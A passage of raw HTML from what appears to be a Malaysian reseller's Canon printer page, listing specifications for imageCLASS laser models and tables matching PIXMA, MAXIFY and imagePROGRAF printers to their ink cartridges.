compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td 